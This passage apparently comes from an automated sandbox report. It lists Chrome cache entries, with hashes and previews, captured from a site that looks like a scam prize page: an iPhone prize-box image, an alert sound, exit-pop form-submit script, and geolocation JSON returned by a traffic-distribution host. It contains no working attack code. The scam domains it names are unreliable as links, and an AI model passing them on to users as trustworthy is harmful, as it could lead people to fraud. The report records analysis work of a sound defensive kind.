                              SHA-256:B01A4B1535F5F682181C7C5D4CC8E56C2BFA0FF66C197C67CADB2B176F91E1A2
                              SHA-512:667C206C3093C35390E54CDA7ADCEE795FC7BB7EBD001F4813A64C3E3991CF1827128B50740F77D1B4D53A58C68E8C968AA8FDDBE363A031BD9D1CDD3997C44B
                              Malicious:false
                              Reputation:low
                              URL:https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/1102_3.js
                              Preview:function stepfinal() {. jQuery("#p_body_content").fadeOut("slow");. jQuery("#p_loading").fadeIn("slow");.}..function goToUrlFinish() {. stepfinal();. PreventExitPop = false;. document.getElementById("p_form_post").submit();.}..function scrollTo(a) {. if ($("#" + a).length) {. var c = $("#" + a).offset();. var b = c.top;. $("html,body").animate({. scrollTop: b. }, {. duration: "slow". });. }.}..function getBrowser() {. if ((navigator.userAgent.indexOf("Opera") || navigator.userAgent.indexOf("OPR")) != -1) {. return "Opera";. } else {. if (navigator.userAgent.indexOf("Chrome") != -1) {. return "Google Chrome";. } else {. if (navigator.userAgent.indexOf("Safari") != -1) {. return "Safari";. } else {. if (navigator.userAgent.indexOf("Firefox") != -1) {. return "Firefox";. } else {.

                              Chrome Cache Entry: 57

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 258 x 185, 8-bit colormap, non-interlaced
                              Category:downloaded
                              Size (bytes):4457
                              Entropy (8bit):7.890505447614777
                              Encrypted:false
                              SSDEEP:96:yYEA9AIbYOaK95M/+aJMEGrjWfuQUH88+cht0ZWBvOkVesPtTTw4kPlGlQt:IARkO79ivRG/WuQd8+AucpxPdTjglGlY
                              MD5:E26AB4191E2B939C553EA223042BE270
                              SHA1:1EF6E06777AD700E46A5D5995573B8AD09D339C8
                              SHA-256:7CC901BCB50159C267C3ECD4995BB69DBD47939CA52C81AB28F527651200E472
                              SHA-512:9FEC9EFFB277074D93FF355BA91D851B6682B64586E3B8443D42AF80E2E24A99BC12F615651A4072DDF677BB42BC6700B2C7C97F5AC2C963670E1A6A507690A7
                              Malicious:false
                              Reputation:low
                              URL:https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/box-iphone14pro.png
                              Preview:.PNG........IHDR................`....PLTE...A@@)('...=<:;98\YWZVTQOM...omkA@?......@?>%%$?==@?>BA@hecSRQSQPDBA=<;ron!..jhgCA@...865A>=;97QOM><;B@?.........ECBVTR...+)(JHF?=;YVTURP......=;:MKJ...OLK'%%%##)''...976ZWU...GEDRPN.........spm_\ZDBAIGE-+*...TQO...hda"! .. ......da_LJH...|ywnki..%...532...b^\GEB753...uro1/...."!031/...............jgd.........qmk\YW.........31B..*...........]ZY..2.....lhfRL^(*7..+....................v.]Vi..#...........0-+..%...h`sGAR;:I!*D....yp.uk~..>&%7..5......mey(.LFDD.%<..5........8T..'..........{.(?u1:f+3\JFZ.)W65H.!>+*=..(..............uw.68T@=N......DFeVQd==V-2N.!M.0K.+C,/@..#u........Ul.L].CU.LMh.#1.................q..Fo.fr....-I.ac.TY}5M|ELtTSsb[p8Bn.A^>@]."F.....T}.`x.@c....gj.Xe.3S..Vy.Ll!0gKKO.....f........7[.pm.]ZuJHI....c.....Cd.7]QNT......0......tRNS..............].rH..... ......IDATx.....................................`j.6&.8..=.Z..-9.C.].....(.W.@CK.Oq..j.....5-W-.5...._.i.Z/..M..E.zc/zW...Z.[..q..M....n..}....!.6..{..

                              Chrome Cache Entry: 58

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:SVG Scalable Vector Graphics image
                              Category:dropped
                              Size (bytes):5519
                              Entropy (8bit):4.1479283018043205
                              Encrypted:false
                              SSDEEP:96:2mYOiC6onP7FiFzPfFiF8PKFiFAPuFiFn:2mYOiC68P7FiFzPfFiF8PKFiFAPuFiFn
                              MD5:1067E4F544573A808DB9CF39397E3B8E
                              SHA1:7D2A7929ED766649E6D09157371AFFAD5B9AE005
                              SHA-256:442F2945EBCD2872EB28599AAD185E96A054C9FE611087EBC02398FADE385C48
                              SHA-512:31CB0BD9F38A5A36DD0F5427E40068FECDF109BE9507C805C0006E4383E699892142E74D22A1BFB1399B2976E11A0ACFA7683D853B99114A9A231712FC274899
                              Malicious:false
                              Reputation:low
                              Preview:<svg xmlns="http://www.w3.org/2000/svg" height="512" width="512" viewBox="0 0 512 512">.. <g fill-rule="evenodd" transform="scale(3.9385)">.. <g stroke-width="1pt">.. <path d="M0 0h247v10H0zm0 20h247v10H0zm0 20h247v10H0zm0 20h247v10H0zm0 20h247v10H0zm0 20h247v10H0zm0 20h247v10H0z" fill="#bd3d44"/>.. <path d="M0 10h247v10H0zm0 20h247v10H0zm0 20h247v10H0zm0 20h247v10H0zm0 20h247v10H0zm0 20h247v10H0z" fill="#fff"/>.. </g>.. <path fill="#192f5d" d="M0 0h98.8v70H0z"/>.. <g fill="#fff">.. <path d="M8.233 2.996l.9 2.767h2.908l-2.353 1.71.899 2.766-2.354-1.71-2.353 1.71.899-2.766-2.354-1.71h2.91zm16.467 0l.899 2.767h2.909l-2.353 1.71.898 2.766L24.7 8.53l-2.353 1.71.898-2.766-2.353-1.71h2.909zm16.467 0l.899 2.767h2.909l-2.353 1.71.899 2.766-2.354-1.71-2.353 1.71.899-2.766-2.354-1.71h2.91zm16.466 0l.899 2.767h2.909l-2.353 1.71.899 2.766-2.354-1.71-2.353 1.71.899-2.766-2.354-1.71h2.91zm16.467 0l.899 2.767h2.909l-2.354 1.71.9 2.766L74.1 8.53l-2.353 1.71.898-2.766-2.353-

                              Chrome Cache Entry: 59

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 768 x 293, 8-bit colormap, non-interlaced
                              Category:dropped
                              Size (bytes):9224
                              Entropy (8bit):7.860802412528303
                              Encrypted:false
                              SSDEEP:192:eyK4FMdg9mkS4amQck2cPcLuRxljuYBVnn4zRC5LVIwUxE/7:1TS4XQck2ScEl6SVnSsLbd7
                              MD5:A0560779CF67AEB9A0C19F68F3582024
                              SHA1:FF8D079FBBBAD6B70BE4D83C760A4A61BC51FF33
                              SHA-256:B585EE5FC0AF431C584664F82E390E5A65BBBC6F201FE495D7C289EA618F5D5E
                              SHA-512:663D00A5E90ED660DCC064095C9411DAE4973CF168DE875A8D8FA96572F3AC070C27A1B74760E1292F7089A3F0BD6BB59A244302F789E9FAFD980B823ABEC30D
                              Malicious:false
                              Reputation:low
                              Preview:.PNG........IHDR.......%.....d.u....VPLTE............................................................................................................................................................................................................................................................................................................................................................ptRNS.&..."...4.i....o................-.@.Z..}.....:..xVO)...Q..b..1.M2$..D...?(lf..s....^H.u..8.*...c..{FW...J]g^....!.IDATx...J.`...D..w.?..1$C.8X71."]t.......?.....\.....................................u.....wg..Tm.q...Z.G.2.........\.t4.JiQ..O..SWe?f54..G?........q....."....N.x.u.v.zo.t.y..Ssw..+a.....X..*&U.o.(j...5.P.)..l..}.<....9.]O.If......$..`&.....w..b.t.d.._.'...^1..........%_.34.;'..Z.R...Ym.......W.skB.?7M.l*Li.fs.=h..p.u.0..]'..-K.e].g....|.c;..VQkBT.j.T...>|....)"[.0*.Y..i.....L...).~L. Ais..lZ....b..$k.B.l..}>.....]$;s9......_.4....Q......X8e7....7kQ.n.U<....z

                              Chrome Cache Entry: 60

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 60x60, components 3
                              Category:downloaded
                              Size (bytes):3157
                              Entropy (8bit):7.787305159364943
                              Encrypted:false
                              SSDEEP:96:0kVdaE3V8f/rWfFvcheOJriEFDmCj8T2nAB:JdF3V8nKfhcQiriODlBc
                              MD5:752F51C4C387C0CA7F4337ACDEEC15D6
                              SHA1:7F9777F95AECECFCE6FA930181269CCE30A4A059
                              SHA-256:227CEC10C842BA3865D12ED22363F87CA5135B3AC2C72E5AB1A3169C4A2D569C
                              SHA-512:8ED7148FCAFA538552E1A063EF7AC074685CB13F78E054C45EDD2B7B07CE49797E233755DCAEA1A6E698A3A8AE128867CE0A846CB4ADFAD51A39E57E43B684F7
                              Malicious:false
                              Reputation:low
                              URL:https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/fr11.jpg
                              Preview:......JFIF.............C....................................................................C.......................................................................<.<.....................................................................................-..>.|........m....3.t.).`..&+.W..Y..i*^v...aH....w.T.T. ...q....q..RS..U.$)`:-...&B.....z......b#.7..o.5.#I.N..."O].E....-. z...s.!*...".N.._?.}.Z...8:.S..#Z4<....wg......+..q......&.............................!"...#1...........(S..g...nw..WP......|..y...&7.s.x.4.......#.. *.....JO9|....F.H.Z..U.....z.......n%..3..G..."....+.l...c.?..L..1../..g.Sp.S4..I...R.EEL...c.g.!.i.c.....$z...a.......\..E....s];!!.P..~.N..........+...;N^...$?b...!Z...t.._...K..........B...j.;.+J...sZ.7.U.....|..o..A......$.8......./..7..dZ..;...|S.!...V..\.F.db.sP ..R. :...."...B.>.~.{....a......j.)7..:uJ.....$...4./..........'."A.A...l...dW..G..;........]..>btL]6..K9;YF.....2...4...=.k.i...1=ZOm..?..3.JJV*Y.rX..ifW....Es#....,.Nb

                              Chrome Cache Entry: 61

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 258 x 185, 8-bit colormap, non-interlaced
                              Category:dropped
                              Size (bytes):4457
                              Entropy (8bit):7.890505447614777
                              Encrypted:false
                              SSDEEP:96:yYEA9AIbYOaK95M/+aJMEGrjWfuQUH88+cht0ZWBvOkVesPtTTw4kPlGlQt:IARkO79ivRG/WuQd8+AucpxPdTjglGlY
                              MD5:E26AB4191E2B939C553EA223042BE270
                              SHA1:1EF6E06777AD700E46A5D5995573B8AD09D339C8
                              SHA-256:7CC901BCB50159C267C3ECD4995BB69DBD47939CA52C81AB28F527651200E472
                              SHA-512:9FEC9EFFB277074D93FF355BA91D851B6682B64586E3B8443D42AF80E2E24A99BC12F615651A4072DDF677BB42BC6700B2C7C97F5AC2C963670E1A6A507690A7
                              Malicious:false
                              Reputation:low
                              Preview:.PNG........IHDR................`....PLTE...A@@)('...=<:;98\YWZVTQOM...omkA@?......@?>%%$?==@?>BA@hecSRQSQPDBA=<;ron!..jhgCA@...865A>=;97QOM><;B@?.........ECBVTR...+)(JHF?=;YVTURP......=;:MKJ...OLK'%%%##)''...976ZWU...GEDRPN.........spm_\ZDBAIGE-+*...TQO...hda"! .. ......da_LJH...|ywnki..%...532...b^\GEB753...uro1/...."!031/...............jgd.........qmk\YW.........31B..*...........]ZY..2.....lhfRL^(*7..+....................v.]Vi..#...........0-+..%...h`sGAR;:I!*D....yp.uk~..>&%7..5......mey(.LFDD.%<..5........8T..'..........{.(?u1:f+3\JFZ.)W65H.!>+*=..(..............uw.68T@=N......DFeVQd==V-2N.!M.0K.+C,/@..#u........Ul.L].CU.LMh.#1.................q..Fo.fr....-I.ac.TY}5M|ELtTSsb[p8Bn.A^>@]."F.....T}.`x.@c....gj.Xe.3S..Vy.Ll!0gKKO.....f........7[.pm.]ZuJHI....c.....Cd.7]QNT......0......tRNS..............].rH..... ......IDATx.....................................`j.6&.8..=.Z..-9.C.].....(.W.@CK.Oq..j.....5-W-.5...._.i.Z/..M..E.zc/zW...Z.[..q..M....n..}....!.6..{..

                              Chrome Cache Entry: 62

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Audio file with ID3 version 2.3.0, contains: MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, Monaural
                              Category:downloaded
                              Size (bytes):8802
                              Entropy (8bit):5.5946484836211505
                              Encrypted:false
                              SSDEEP:192:JN+X8ssZf/IQc5Vkm77EheIp9mLOrEZoz:vS2/PKNxdSnz
                              MD5:6D2D3DA2EA28ACE816FA4A138829DC18
                              SHA1:606E0EC3D7FB05C69F16233CFE1FF0A0EE760505
                              SHA-256:D79BC81189750262716692ADE6CC4D6FB6C4FBC4AA01C2B9D0AA67E5788821FC
                              SHA-512:69B4B77A4233D081DEECA7A19F9234C24AEAB11390988C222119356F5BAD406AED28C0EC25E9881031B51A930171F52C954F376E635DEFE10F244530D749895E
                              Malicious:false
                              Reputation:low
                              URL:https://y1uy13f.xuowltwo.live/media/mainstream/alert.mp3
                              Preview:ID3.......TCON.......(12)..............+...dp ..WJ.m....'e.p..I...._d.0..........G(d.L].m..#l..B....oA....W...6.R.......`.H.>(r....nj d.h..0t."D..o..FX.!..LF.....Aw#....Eb.i..O.....rH......0..%.....w.v*.j...\V.k.H.8..{).[.....V".......?r#a.>.e.......7....s....|....N..B.ZK........M..s......E3.(..fN.!..eN.$...8d...&...K7.....Z.X....H/.........-..>...&.J....n.4l....K)C.y.@...}.'3_......t..N.J.Rj1...../8...8Q.J.E..]4.9..}.m...69.,.0Hz........j..tC!".f..$0 ....Z., ....0........K.......j/Lp.c.H.................~..p..""..'A.&.).......4.M9.M.....3`.4 c./.....4.......u......F.p.........&.X..........M...@.R+....0.@.Ep..a....`.......&.. (.q........<.D.........`.......*....r...`...@......`......&0.@......|0...(Z7>.0.@....',....Yr..{..h.4ol....@.............)0.{y./.~.J..>.....4....b..M.x.g.Vo..u.S!....g.f.Y..]...1..O.d+.H....le.!..3.................!4 .....9.Bw.w.%.NnQ..-(O....Y..Eh........X.0V.D...&.6...e'.^.3g.9f...."S....2.I.Q...2..K...a..XT&.<~.D2lpt..ap...tdOLQ.

                              Chrome Cache Entry: 63

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 60x60, components 3
                              Category:dropped
                              Size (bytes):3157
                              Entropy (8bit):7.787305159364943
                              Encrypted:false
                              SSDEEP:96:0kVdaE3V8f/rWfFvcheOJriEFDmCj8T2nAB:JdF3V8nKfhcQiriODlBc
                              MD5:752F51C4C387C0CA7F4337ACDEEC15D6
                              SHA1:7F9777F95AECECFCE6FA930181269CCE30A4A059
                              SHA-256:227CEC10C842BA3865D12ED22363F87CA5135B3AC2C72E5AB1A3169C4A2D569C
                              SHA-512:8ED7148FCAFA538552E1A063EF7AC074685CB13F78E054C45EDD2B7B07CE49797E233755DCAEA1A6E698A3A8AE128867CE0A846CB4ADFAD51A39E57E43B684F7
                              Malicious:false
                              Reputation:low
                              Preview:......JFIF.............C....................................................................C.......................................................................<.<.....................................................................................-..>.|........m....3.t.).`..&+.W..Y..i*^v...aH....w.T.T. ...q....q..RS..U.$)`:-...&B.....z......b#.7..o.5.#I.N..."O].E....-. z...s.!*...".N.._?.}.Z...8:.S..#Z4<....wg......+..q......&.............................!"...#1...........(S..g...nw..WP......|..y...&7.s.x.4.......#.. *.....JO9|....F.H.Z..U.....z.......n%..3..G..."....+.l...c.?..L..1../..g.Sp.S4..I...R.EEL...c.g.!.i.c.....$z...a.......\..E....s];!!.P..~.N..........+...;N^...$?b...!Z...t.._...K..........B...j.;.+J...sZ.7.U.....|..o..A......$.8......./..7..dZ..;...|S.!...V..\.F.db.sP ..R. :...."...B.>.~.{....a......j.)7..:uJ.....$...4./..........'."A.A...l...dW..G..;........]..>btL]6..K9;YF.....2...4...=.k.i...1=ZOm..?..3.JJV*Y.rX..ifW....Es#....,.Nb

                              Chrome Cache Entry: 64

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):646
                              Entropy (8bit):5.288738723852024
                              Encrypted:false
                              SSDEEP:12:YGGHrpH1c0aNmi7W4ZL3JReiISUuNmyr5YQYCtSUuNmcvr5Ykgm7DMjwEsV+:YhFHwNhC4ZLJfUTyr5nYxUTcvr5Km74X
                              MD5:F52109C337C1D2A05581C0DED10DB2AE
                              SHA1:6CAC46951051E862BF008E01B8A03F1BC0FF1701
                              SHA-256:71769019D0F6847A78458800C13EA7A19489B6F03E3F6AED069EEEF179F25193
                              SHA-512:D02690B968F86C53B40C98CD1B45601697650740642C566DE7E5AC6D6C7B09954F7171EFD44CB74A7F52FA2B323D8866580BCE864B5EF310D05F7C7C8A0B342D
                              Malicious:false
                              Reputation:low
                              Preview:{"cc":"US","cnames":{"de":"USA","en":"United States","es":"Estados Unidos","fr":".tats Unis","ja":"....","pt-BR":"EUA","ru":"...","zh-CN":".."},"city":{"de":"New York City","en":"New York","es":"Nueva York","fr":"New York","ja":"......","pt-BR":"Nova Iorque","ru":"...-....","zh-CN":""},"subdiv":[{"de":"New York","en":"New York","es":"Nueva York","fr":"New York","ja":".......","pt-BR":"Nova Iorque","ru":"...-....","zh-CN":"..."}],"pc":"10118","ip":"191.96.227.222","brand":"","model":"Windows Desktop","browser":"Chrome","isp":"Cogent Communications","lat":40.7123,"long":-74.0068}

                              Chrome Cache Entry: 65

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:JSON data
                              Category:downloaded
                              Size (bytes):646
                              Entropy (8bit):5.288738723852024
                              Encrypted:false
                              SSDEEP:12:YGGHrpH1c0aNmi7W4ZL3JReiISUuNmyr5YQYCtSUuNmcvr5Ykgm7DMjwEsV+:YhFHwNhC4ZLJfUTyr5nYxUTcvr5Km74X
                              MD5:F52109C337C1D2A05581C0DED10DB2AE
                              SHA1:6CAC46951051E862BF008E01B8A03F1BC0FF1701
                              SHA-256:71769019D0F6847A78458800C13EA7A19489B6F03E3F6AED069EEEF179F25193
                              SHA-512:D02690B968F86C53B40C98CD1B45601697650740642C566DE7E5AC6D6C7B09954F7171EFD44CB74A7F52FA2B323D8866580BCE864B5EF310D05F7C7C8A0B342D
                              Malicious:false
                              Reputation:low
                              URL:https://jsontdsexit2.com/ExtService.svc/getextparams
                              Preview:{"cc":"US","cnames":{"de":"USA","en":"United States","es":"Estados Unidos","fr":".tats Unis","ja":"....","pt-BR":"EUA","ru":"...","zh-CN":".."},"city":{"de":"New York City","en":"New York","es":"Nueva York","fr":"New York","ja":"......","pt-BR":"Nova Iorque","ru":"...-....","zh-CN":""},"subdiv":[{"de":"New York","en":"New York","es":"Nueva York","fr":"New York","ja":".......","pt-BR":"Nova Iorque","ru":"...-....","zh-CN":"..."}],"pc":"10118","ip":"191.96.227.222","brand":"","model":"Windows Desktop","browser":"Chrome","isp":"Cogent Communications","lat":40.7123,"long":-74.0068}

                              Chrome Cache Entry: 66

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 60x60, components 3
                              Category:downloaded
                              Size (bytes):2814
                              Entropy (8bit):7.743533827229624
                              Encrypted:false
                              SSDEEP:48:YEdDS5hraep61Mi9nBmMcv1wD+TvgYqs/CIQPQ/rRH8AsHylxW:/dGPrsOi9BmMo1waTLqVXAsSlxW
                              MD5:F17D127DFCAA6F94929EEDD080276DF0
                              SHA1:EC801473523B8EB44E123B5634081D2B57715BA6
                              SHA-256:0108E4D428F408F819F174AE8A5923B4010E80A14FC9872B018C12781E114403
                              SHA-512:39F5724235A64843E888CC69061D32C3079FD1A1E15FA45309558B270AEFD0E6D3CF9FAA4A5718A014CC9C2062E6AB9A7D82F29D1077A14388B9983050779FCA
                              Malicious:false
                              Reputation:low
                              URL:https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/fr6.jpg
                              Preview:......JFIF.............C....................................................................C.......................................................................<.<...................................................................................t;.K..hgs......7.y..|UH`.'.7 ..#.{xn.]vK.F3.uHB..^.(..HS.Q..e.....KC!..X,.O...6\.....I..ZR..].W[.n.$.-L..:Q1l(%*..fZ....."O3K+....S...4....|..Y...].H.......:.qdQ..fJ.....\!.~s...)..............................1..".!%4A..........x.......8X.9.W...:........I*.98.-...ph.s..G....h.........S..I.O.....k.;.....Y5....oo.Z..O...d4..U+...b..A...R5^.....?I(4.G..t.2,...{....&vV.0P.}9,'?..F.7.>@c....GQvW.n...x.f.s,AG..>...W1.._.iF.+..2E}...T...p.ovy..p...^T..r\F......t..F..0..........#Y......f...h.9\...5.K.kS..$..i........6...hZ.EKHI..i...s.....ct.f..f..}...O.@YI....U.C....z.x#b&w~....FNjT .<.&.qC...i..).DU&~./x..9...m..$Qq>ff?...r..'....es.s...4.,....p...<........P...........J...9".W..o.,x.....IOW.......CK0..*"1.M....

                              Chrome Cache Entry: 67

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 60x60, components 3
                              Category:dropped
                              Size (bytes):3043
                              Entropy (8bit):7.750974549902366
                              Encrypted:false
                              SSDEEP:48:R9EMIwCO0aPaBTkOuvGfGUvKFCVG1OINgJi6k/X72jh6ysCl5zFja:RT1CgPayOuveXVGsHU6kPSjh6ysCl5g
                              MD5:7F103BC91A8084CD154189B5EBB2CF86
                              SHA1:375E58C42A8C409BBF111847A1F6798BA6C0D5F5
                              SHA-256:346139AAEC984853288672896D297DED47AC7EE1CB77CA43B63E130952CDD946
                              SHA-512:91AEC64B967B80B4D7E304ECEFD74CB09FFC45FBA69A2337A5863852CCB8C4EEF372A6D5CB7A376883064737361DB64979F77B1E29C2A4674CD8D142BBDCF40D
                              Malicious:false
                              Reputation:low
                              Preview:......JFIF.............C....................................................................C.......................................................................<.<...........................................................................................xm..E.^#z.o...o...Y....KS......W~YJ@U_...\.}...}.^.G3.....x.".3..?b/.{D...JO(....s...K.k.I........ux|)Q.7.s...V.A.]..Z$....].r.[.Kz...G.(?.....V.4..C.........PNl..F.)x.-x...#................................!...........=a..S....!.7.D.4..Kcb..8..#T.b.....F.k....Q....i.*.E...,.v2.oG.y..../..zq.......u..1.sg...^.gV....X.3p?V.,.m.p..+...~.C<<O...{......6L.6..R.>G@.W..q.....Nw2.<h.....E.%e..El...^....!:..#.h.)....=.....Mk.W+.....=k.9S..}.|.....X.U.c....k.&.M...n.b..!T.'....$k:.IC..u.y..TM6.....v.}b&.Du...;Gb/....59`!.V....q....M..cz..+.Q.L:-...l.".Va..-k..Y..q\.M_.W,e.3>:...h..x.....;p....Y3..Z.H;.x......H.$*c`..=..:J.).).<{.$5.hU..r..T.......&...r.6"....9...eO..........xu...3.........................

                              Chrome Cache Entry: 68

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 60x60, components 3
                              Category:dropped
                              Size (bytes):2939
                              Entropy (8bit):7.774721034631434
                              Encrypted:false
                              SSDEEP:48:Jxyq6vQW/WCtSVwkdFGlioDLVrg7r9he2mv6XXFRs4jbmz4v7jVQBI7Q:XVEliEKJolo/s4jKo7Wy0
                              MD5:4C88EBF87B0CC26121497DE03DB7F64A
                              SHA1:A1256A5CFCD62223172EB3633659CADDFF6CF005
                              SHA-256:28DB5EDB0FE5E61F42EB8A0D10250A317F3AC840E074FFA761CB953C330F2CF6
                              SHA-512:00C28D59A8EB91B5F27761899D79C431039640351C9C79EE702DF5B02374DF7CC93D65AC8898E062B86C6C95CA6BA59F56478F461A660A3126CE99765CE52749
                              Malicious:false
                              Reputation:low
                              Preview:......JFIF.............C....................................................................C.......................................................................<.<.................................................................................XT9..U7..M.^.gI.7.[..&n.....W5/N.]."!)..GT......b....[F.K:..G.........$<...a...{[.\im.~{/kh.T..qz...3...7..2.i.........m..s^k.i.....{.....c6v...^.......m.q5..&..S....S.8.....T.....#..............................."1..........C..g...P.0....&C......<..f....VE.0.1...x.NAe--0..........>..r..4.G...Y6.G.y.......g).t.}h.....>..e..pd.O .[...`.9..'(M..h...F...e([.z.g.z..,F"...9rah.."..C.%2.,iP...XG..(.ZJ*F.6.,..E"?...J$9.z.....A..%.[.W-eR..1....lxlM....-...b.J...06AI_...........,..;.....4..e$r..E..Ha..B........Wd.......I&...o5~....XNU.l..!...EF[.(.M.I....3.....A'8......D..W.......F3.n9..+r...+ ~9.\.....K4&.$..v5g...a.I...f..SnM.....%....y}.Y...D.h.f/..J2?..H".r...>...E.....*.X.:c......r..P..n....5......................

                              Chrome Cache Entry: 69

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 60x60, components 3
                              Category:dropped
                              Size (bytes):2814
                              Entropy (8bit):7.743533827229624
                              Encrypted:false
                              SSDEEP:48:YEdDS5hraep61Mi9nBmMcv1wD+TvgYqs/CIQPQ/rRH8AsHylxW:/dGPrsOi9BmMo1waTLqVXAsSlxW
                              MD5:F17D127DFCAA6F94929EEDD080276DF0
                              SHA1:EC801473523B8EB44E123B5634081D2B57715BA6
                              SHA-256:0108E4D428F408F819F174AE8A5923B4010E80A14FC9872B018C12781E114403
                              SHA-512:39F5724235A64843E888CC69061D32C3079FD1A1E15FA45309558B270AEFD0E6D3CF9FAA4A5718A014CC9C2062E6AB9A7D82F29D1077A14388B9983050779FCA
                              Malicious:false
                              Reputation:low
                              Preview:......JFIF.............C....................................................................C.......................................................................<.<...................................................................................t;.K..hgs......7.y..|UH`.'.7 ..#.{xn.]vK.F3.uHB..^.(..HS.Q..e.....KC!..X,.O...6\.....I..ZR..].W[.n.$.-L..:Q1l(%*..fZ....."O3K+....S...4....|..Y...].H.......:.qdQ..fJ.....\!.~s...)..............................1..".!%4A..........x.......8X.9.W...:........I*.98.-...ph.s..G....h.........S..I.O.....k.;.....Y5....oo.Z..O...d4..U+...b..A...R5^.....?I(4.G..t.2,...{....&vV.0P.}9,'?..F.7.>@c....GQvW.n...x.f.s,AG..>...W1.._.iF.+..2E}...T...p.ovy..p...^T..r\F......t..F..0..........#Y......f...h.9\...5.K.kS..$..i........6...hZ.EKHI..i...s.....ct.f..f..}...O.@YI....U.C....z.x#b&w~....FNjT .<.&.qC...i..).DU&~./x..9...m..$Qq>ff?...r..'....es.s...4.,....p...<........P...........J...9".W..o.,x.....IOW.......CK0..*"1.M....

                              Chrome Cache Entry: 70

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 60x60, components 3
                              Category:dropped
                              Size (bytes):3601
                              Entropy (8bit):7.815973019413374
                              Encrypted:false
                              SSDEEP:96:RHYz89aCbdm3mZE8qmCCk147EtLUDFWk1lo2kpdLR:RHYznCZmAq0ZYteF9lodpR
                              MD5:C74A5BEFD416E24626972E88ED65526D
                              SHA1:4E8C25553248600CF23C3D6BCEC488D986A129F8
                              SHA-256:53BB570F4465306A78670ECBEA911BA0362251D2DC825D9EA0CB5D1C70F413AC
                              SHA-512:BCC99E5266CC46054DD7A5CD061C87BE597FFD6885027B82FDE9883FE910AF222D50C2D1E33E17CC202733EA1F0DE6AB1B5720503D8FBB5A6CE069EBF3DA718B
                              Malicious:false
                              Reputation:low
                              Preview:......JFIF.............C....................................................................C.......................................................................<.<.....................................................................................y(g...B..{P...!%7}5{..V...)z..E..L.....b.(.xo;.....jJ.!+.rw...5.[eS.yhe.?..]..A+a..qX...tVa.m..=ni%K".....}..$.US.6...v[F./....H.S^b.d......9....I.l,.M.=h........l..#-S..hJj..Tk8.CU. ......&.................................!%&...........~.m.E.V......6o.X...~.effgC...|?.u..2.......,.....x..W.}.~c..&..}.W...7....O\y.......n...r..MdR........L.^.m(.:9.z...V........`-'.....k.O....".!..&9>.."..rZ..l.........=.....T...2>....+...5Y..."..wM.x..o.vg.Y"~..........;`.....0..uz..-.,G4BbI.+.#....S..._.*.oD.H^.b:.-....H...q.............<nH.@B?.K..c.....k..../...#Y.+y..H\.4E(t.t~..:.....Jka..J..zo.x...j}...|yj..qa..=c)-g....}...*....e.c..x7..._.eZ.`..,...j.eVb..,Nz...eH.......^...E..(..!.d.........f..c....%.X.I.y...X]i[.&

                              Chrome Cache Entry: 71

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:downloaded
                              Size (bytes):39806
                              Entropy (8bit):4.892612926908833
                              Encrypted:false
                              SSDEEP:192:khGsNIpOSuav/Tqlg3mj6/GlQT5oubtAzv/JqFbNAqldll2ocGR:kh0pOSR/Tqlg3mj6/GlQ1ezvxqFbyqVD
                              MD5:B7A46A018DCD21A4828BAE0B04DDCC6C
                              SHA1:1D8418D6CC45E5C29E1AAB008C18EA633E7730C4
                              SHA-256:299595FD56AA6A2FCFAC34FCF780D33B61785AD96F19485E65A33EAD8FD69CBC
                              SHA-512:175F0BE8E75AA784BE09F1BF92B730D7BB7CF623999D17675F3BA7F103B30E904E6D80D73B8A01757E0BA2D1545D8C0A645646A222B665B6A808EC777C366743
                              Malicious:false
                              Reputation:low
                              URL:https://y1uy13f.xuowltwo.live/media/mainstream/flag-icon/css/flag-icon.css
